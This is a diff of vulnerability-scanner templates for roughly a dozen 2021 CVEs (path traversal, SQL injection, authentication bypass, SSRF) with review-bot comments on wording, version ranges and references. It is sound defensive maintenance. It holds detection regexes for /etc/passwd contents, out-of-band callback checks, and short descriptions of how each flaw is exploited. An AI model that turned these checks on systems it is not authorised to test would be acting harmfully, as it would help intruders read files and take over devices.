- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
||||||
- https://github.com/express-handlebars/express-handlebars/pull/163
|
- https://github.com/express-handlebars/express-handlebars/pull/163
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-32820
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||||
cvss-score: 8.6
|
cvss-score: 8.6
|
||||||
|
@ -23,14 +24,16 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
- "daemon:[x*]:0:0:"
|
- "daemon:[x*]:0:0:"
|
||||||
- "operator:[x*]:0:0:"
|
- "operator:[x*]:0:0:"
|
||||||
part: body
|
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
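Review bot: moving `part: body` above the `regex:` list and the status matcher to the end is behaviour-neutral under `matchers-condition: and`, so no objection there. While this matcher is being touched, the `daemon:[x*]:0:0:` and `operator:[x*]:0:0:` alternatives deserve a look: `[x*]` is a one-character class (a literal `x` or `*`), and neither account normally carries uid 0 and gid 0 in /etc/passwd, so under `condition: or` these patterns add almost nothing beyond `root:.*:0:0:`; consider dropping them or rewriting them against the accounts' real uid/gid fields.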
@ -4,12 +4,12 @@ info:
|
||||||
name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
|
name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: high
|
severity: high
|
||||||
description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
|
description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
|
|
||||||
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
|
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
|
||||||
- https://www.zyxel.com/us/en/support/security_advisories.shtml
|
- https://www.zyxel.com/us/en/support/security_advisories.shtml
|
||||||
- https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105
|
- https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 7.8
|
cvss-score: 7.8
|
||||||
|
@ -26,9 +26,6 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
@ -36,3 +33,9 @@ requests:
|
||||||
- "Firmware Version"
|
- "Firmware Version"
|
||||||
- "Firmware Build Time"
|
- "Firmware Build Time"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,14 +1,15 @@
|
||||||
id: CVE-2021-33544
|
id: CVE-2021-33544
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Geutebruck RCE
|
name: Geutebruck - Remote Command Injection
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||||
reference:
|
reference:
|
||||||
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
|
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
|
||||||
- https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
|
- https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
|
||||||
- https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
|
- https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-33544
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 7.2
|
cvss-score: 7.2
|
||||||
|
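Review bot: the new description is missing a word: "susceptible to multiple vulnerabilities its web-based management interface" should read "susceptible to multiple vulnerabilities in its web-based management interface". The `name` change to "Remote Command Injection" matches the description better than the old "RCE", and the NVD reference addition is fine.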
@ -28,3 +29,5 @@ requests:
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -4,12 +4,12 @@ info:
|
||||||
name: FAUST iServer 9.0.018.018.4 - Local File Inclusion
|
name: FAUST iServer 9.0.018.018.4 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: An issue was discovered in FAUST iServer before 9.0.019.019.7. For each URL request, it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.
|
description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.
|
||||||
reference:
|
reference:
|
||||||
- https://cxsecurity.com/issue/WLB-2022010120
|
- https://cxsecurity.com/issue/WLB-2022010120
|
||||||
- https://www.cvedetails.com/cve/CVE-2021-34805
|
|
||||||
- http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html
|
- http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html
|
||||||
- http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
|
- http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-34805
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
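Review bot: The version in the name and in the description disagree, and the hunk leaves it that way: `name: FAUST iServer 9.0.018.018.4 - Local File Inclusion` names the build from the Packet Storm exploit title, while the rewritten description says `before 9.0.019.019.7`. Other templates in this PR put the affected range in the name with a `<` prefix, so `FAUST iServer <9.0.019.019.7 - Local File Inclusion` would be consistent; if 9.0.018.018.4 is kept because it is the version the proof of concept was tested on, say so in the description. Swapping the cvedetails link for the NVD entry is fine.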
@ -35,3 +35,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,15 +1,15 @@
|
||||||
id: CVE-2021-36748
|
id: CVE-2021-36748
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: PrestaHome Blog for PrestaShop - SQL Injection
|
name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection
|
||||||
author: whoever
|
author: whoever
|
||||||
severity: high
|
severity: high
|
||||||
description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection (blind) via sb_category parameter.
|
description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-36748
|
|
||||||
- https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
|
- https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
|
||||||
- https://alysum5.promokit.eu/promokit/documentation/blog/
|
- https://alysum5.promokit.eu/promokit/documentation/blog/
|
||||||
- https://blog.sorcery.ie
|
- https://blog.sorcery.ie
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36748
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -37,3 +37,5 @@ requests:
|
||||||
- "contains(tolower(all_headers_2), 'index.php?controller=404')"
|
- "contains(tolower(all_headers_2), 'index.php?controller=404')"
|
||||||
- "len(body_2) == 0"
|
- "len(body_2) == 0"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,23 +1,23 @@
|
||||||
id: CVE-2021-37589
|
id: CVE-2021-37589
|
||||||
info:
|
info:
|
||||||
name: Virtua Software Cobrança - Firebird Blind SQL Injection
|
name: Virtua Software Cobranca <12R - Blind SQL Injection
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Virtua Cobranca before 12R allows SQL Injection on the login page.
|
Virtua Cobranca before 12R allows blind SQL injection on the login page.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
|
- https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
|
||||||
- https://www.virtuasoftware.com.br/
|
- https://www.virtuasoftware.com.br/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-37589
|
|
||||||
- https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
|
- https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-37589
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-37589
|
cve-id: CVE-2021-37589
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.favicon.hash:876876147
|
shodan-query: http.favicon.hash:876876147
|
||||||
verified: "true"
|
|
||||||
tags: cve,cve2021,virtua,sqli
|
tags: cve,cve2021,virtua,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
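Review bot: The name edit drops two things at once: the accent (`Cobrança` to `Cobranca`) and the `Firebird` qualifier, and nothing else in the file now records that the backend is Firebird. ASCII-only names are a reasonable convention, but the database engine matters to anyone tuning blind-injection payloads, so carry it into the description, e.g. `Virtua Cobranca before 12R allows blind SQL injection (Firebird) on the login page.` The `verified: "true"` to `verified: true` change is the correct YAML typing and matches the other templates in this PR.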
@ -47,12 +47,15 @@ requests:
|
||||||
req-condition: true
|
req-condition: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- "status_code_2 == 500 && status_code_3 == 200"
|
|
||||||
|
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'contains(body_3, "Os parametros não estão informados corretamente")'
|
- 'contains(body_3, "Os parametros não estão informados corretamente")'
|
||||||
- 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")'
|
- 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")'
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code_2 == 500 && status_code_3 == 200"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
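Review bot: Moving the `"status_code_2 == 500 && status_code_3 == 200"` DSL matcher below the body matcher is cosmetic: under `matchers-condition: and` every matcher must pass regardless of order, so there is no behavioural change. A one-line mention in the commit message would stop a later reader from hunting for a logic change that is not there. The only other change in the hunk is the trailing `# Enhanced by mp on 2022/06/30` comment.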
@ -1,22 +1,22 @@
|
||||||
id: CVE-2021-39312
|
id: CVE-2021-39312
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
|
name: WordPress True Ranker <2.2.4 - Local File Inclusion
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
|
description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
|
- https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39312
|
|
||||||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312
|
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312
|
||||||
- https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
|
- https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-39312
|
||||||
remediation: Fixed in version 2.2.4
|
remediation: Fixed in version 2.2.4
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-39312
|
cve-id: CVE-2021-39312
|
||||||
cwe-id: CWE-22,CWE-22
|
cwe-id: CWE-22,CWE-22
|
||||||
tags: lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021
|
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
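Review bot: `cwe-id: CWE-22,CWE-22` is duplicated on both sides of the diff and should be collapsed to `cwe-id: CWE-22` while this block is being touched. The rewritten description also reads awkwardly and narrows the claim: `allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter ... via local file inclusion` has a stray comma and two `via` clauses, and it loses the `arbitrary files, including` wording that the old name (`Unauthenticated Arbitrary File Access via Path Traversal`) supports. Suggest: `WordPress True Ranker before version 2.2.4 allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter in ~/admin/vendor/datatables/examples/resources/examples.php.`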
@ -40,3 +40,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,21 +1,22 @@
|
||||||
id: CVE-2021-39316
|
id: CVE-2021-39316
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval
|
name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter.
|
description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
|
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
|
||||||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316
|
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316
|
||||||
- http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html
|
- http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-39316
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-39316
|
cve-id: CVE-2021-39316
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
|
tags: cve,cve2021,wp,wordpress,lfi,wp-plugin,zoomsounds
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
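Review bot: The name and the description disagree on the affected range and the PR keeps both: `name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion` versus `WordPress Zoomsounds plugin 6.45 and earlier allows ...`, and the Packet Storm reference title says 6.45. Pick one range, the one the advisory gives, and use it in both places. The MITRE link and the new NVD link point at the same record; elsewhere in this PR the MITRE link was replaced rather than kept, so dropping it here would be consistent.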
@ -32,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,11 +1,11 @@
|
||||||
id: CVE-2021-40149
|
id: CVE-2021-40149
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Reolink E1 Zoom Camera - Rsa Key Information Disclosure
|
name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
|
||||||
author: For3stCo1d
|
author: For3stCo1d
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key disclosure vulnerability.
|
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
|
||||||
reference:
|
reference:
|
||||||
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
||||||
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
||||||
|
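Review bot: This is the only file in the PR whose reference list does not end up with an NVD entry; every other template here gains or already has `https://nvd.nist.gov/vuln/detail/<id>`. Add the CVE-2021-40149 link for consistency. Moving the `(RSA)` qualifier from the name into the description is fine and the new name reads better.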
@ -33,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,15 +1,15 @@
|
||||||
id: CVE-2021-40822
|
id: CVE-2021-40822
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Geoserver - SSRF
|
name: Geoserver - Server-Side Request Forgery
|
||||||
author: For3stCo1d
|
author: For3stCo1d
|
||||||
severity: high
|
severity: high
|
||||||
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
|
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
|
||||||
reference:
|
reference:
|
||||||
- https://gccybermonks.com/posts/cve-2021-40822/
|
- https://gccybermonks.com/posts/cve-2021-40822/
|
||||||
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
|
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
|
|
||||||
- https://github.com/geoserver/geoserver/releases
|
- https://github.com/geoserver/geoserver/releases
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
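Review bot: The name lacks the affected range that the description gives: `name: Geoserver - Server-Side Request Forgery` while the description says `GeoServer through 2.18.5 and 2.19.x through 2.19.2`. Other names in this PR carry the range with a `<` or `<=` prefix; `GeoServer <=2.18.5, 2.19.x <=2.19.2 - Server-Side Request Forgery` (or `<2.19.3`) would let a scan summary convey it without opening the file. The product is also spelled `Geoserver` in the name and `GeoServer` in the description; the project's own spelling is GeoServer.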
@ -18,7 +18,7 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
fofa-query: app="GeoServer"
|
fofa-query: app="GeoServer"
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve2021,ssrf,geoserver,cve
|
tags: cve,cve2021,ssrf,geoserver
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
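Review bot: `verified: "true"` is left as a quoted string here, whereas the same field is converted to the bare boolean `true` in the other templates this PR touches. Since the hunk already rewrites the adjacent `tags:` line, change it to `verified: true` in the same edit so the metadata type is uniform across the PR.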
@ -43,3 +43,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: CVE-2021-41282
|
id: CVE-2021-41282
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: pfSense Arbitrary File Write to RCE
|
name: pfSense - Arbitrary File Write
|
||||||
author: cckuailong
|
author: cckuailong
|
||||||
severity: high
|
severity: high
|
||||||
description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
|
description: |
|
||||||
|
diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
|
||||||
|
remediation: |
|
||||||
|
Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later.
|
||||||
reference:
|
reference:
|
||||||
- https://www.shielder.it/advisories/pfsense-remote-command-execution/
|
- https://www.shielder.it/advisories/pfsense-remote-command-execution/
|
||||||
- https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
|
- https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
|
||||||
|
- https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41282
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41282
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
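Review bot: Dropping `RCE` from the name (`pfSense - Arbitrary File Write`) is defensible if the template only confirms the write, but the description should then keep the escalation context the references give: the Shielder advisory URL is `pfsense-remote-command-execution` and the Rapid7 module is `pfsense_diag_routes_webshell`. One sentence saying that a file write into the web root yields code execution keeps the `high` severity legible. The name also lacks the `2.5.2` version the description states, which other names in this PR carry. The added `remediation:` block with the Netgate SA link is a good addition, and `i.e.` to `e.g.` is the right correction.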
@ -53,3 +57,5 @@ requests:
|
||||||
- "contains(body, 'c3959e8a43f1b39b0d1255961685a238')"
|
- "contains(body, 'c3959e8a43f1b39b0d1255961685a238')"
|
||||||
- "status_code==200"
|
- "status_code==200"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by cs 06/30/2022
|
||||||
|
|
|
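Review bot: The trailing comment `# Enhanced by cs 06/30/2022` uses a different format from the `# Enhanced by mp on 2022/06/30` lines added to every other file in this PR (no `on`, US date order). Harmonise it so the marker stays greppable. The matcher itself, a fixed marker string plus `status_code==200` under `condition: and`, is unchanged.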
@ -1,18 +1,18 @@
|
||||||
id: CVE-2021-44103
|
id: CVE-2021-42192
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: KOGA 0.14.9 - Privilege Escalation
|
name: KONGA 0.14.9 - Privilege Escalation
|
||||||
author: rschio
|
author: rschio
|
||||||
severity: high
|
severity: high
|
||||||
description: Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
|
description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
|
||||||
reference:
|
reference:
|
||||||
- http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
|
- http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
|
||||||
- https://www.exploit-db.com/exploits/50521
|
- https://www.exploit-db.com/exploits/50521
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103
|
- hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
cve-id: CVE-2021-44103
|
cve-id: CVE-2021-42192
|
||||||
cwe-id: CWE-269
|
cwe-id: CWE-269
|
||||||
tags: cve,cve2021,konga,authenticated
|
tags: cve,cve2021,konga,authenticated
|
||||||
|
|
||||||
|
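Review bot: The new NVD URL is malformed: `- hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192` has a doubled `h`. The id change from CVE-2021-44103 to CVE-2021-42192 also has to be reflected in the template's file name and anything keyed on the old id, and the PR should state which of the two records is authoritative so the relabel can be checked. The description is still hard to parse (`allows attackers to set higher privilege users to full administration access`); something like `allows an authenticated low-privileged user to obtain full administrator access via the ADMIN parameter of /api/user/{ID}` follows the `authenticated` tag, the `PR:L` vector and the reference titles. The `KOGA` to `KONGA` fix is good.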
@ -77,3 +77,5 @@ requests:
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '"token":"(.*)"'
|
- '"token":"(.*)"'
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
|
@ -1,16 +1,16 @@
|
||||||
id: CVE-2021-45968
|
id: CVE-2021-45968
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Pascom CPS Path Traversal
|
name: Pascom CPS - Local File Inclusion
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Pascom version packaged with Cloud Phone System (CPS)
|
Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.
|
||||||
